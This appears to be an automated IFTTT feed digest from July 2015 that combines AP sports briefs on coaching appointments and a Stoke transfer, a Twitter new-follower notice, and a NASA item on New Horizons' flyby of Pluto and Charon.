TUNIS, Tunisia (AP) Tunisia has appointed Henry Kasperczak as new coach, bringing the Pole back for a second spell in charge.

from FOX Sports Digital http://ift.tt/1gBIPBz
via IFTTT

Stoke signs Moha El Ouriachi from Barcelona

STOKE, England (AP) Stoke says it has completed the signing of Barcelona winger Moha El Ouriachi.

from FOX Sports Digital http://ift.tt/1RyDs6H
via IFTTT

I have a new follower on Twitter


Sara
Work,tweet & #followback in #tech #robots #IoT #machinelearning #design #philosophy #art /*Double-degree Engineer, Biorobotics @tohoku_univ, MSc @CentraleMars*/
Japan 仙台市に留学生 - France

Following: 2792 - Followers: 2592

July 15, 2015 at 05:50AM via Twitter http://twitter.com/Sara_2190

Nigeria confirms Sunday Oliseh as new coach

ABUJA, Nigeria (AP) The Nigeria Football Federation has confirmed the appointment of former midfielder and captain Sunday Oliseh as the coach of the national team.

from FOX Sports Digital http://ift.tt/1HtUSJS
via IFTTT

New Horizons Passes Pluto and Charon


Will the New Horizons spacecraft survive its closest approach to Pluto and return useful images and data? Humanity will know in a few hours. Regardless of how well it functions, New Horizons' rapid speed will take it whizzing past Pluto and its moons today, with the time of closest approach being at 11:50 UT (7:50 am EDT). To better take images and data, though, the robotic spacecraft was preprogrammed and taken intentionally out of contact with the Earth until about 1:00 am UT July 15, which corresponds to about 9:00 pm EDT on July 14. Therefore, much of mankind will be holding its breath through this day, hoping that the piano-sized spacecraft communicates again with ground stations on Earth. Hopefully, at that time, New Horizons will begin beaming back new and enlightening data about a world that has remained remote and mysterious since its discovery 85 years ago. Featured above is a New Horizons composite image of the moon Charon (left) and Pluto (right) taken 3 days ago, already showing both worlds in unprecedented detail. via NASA http://ift.tt/1HsjikF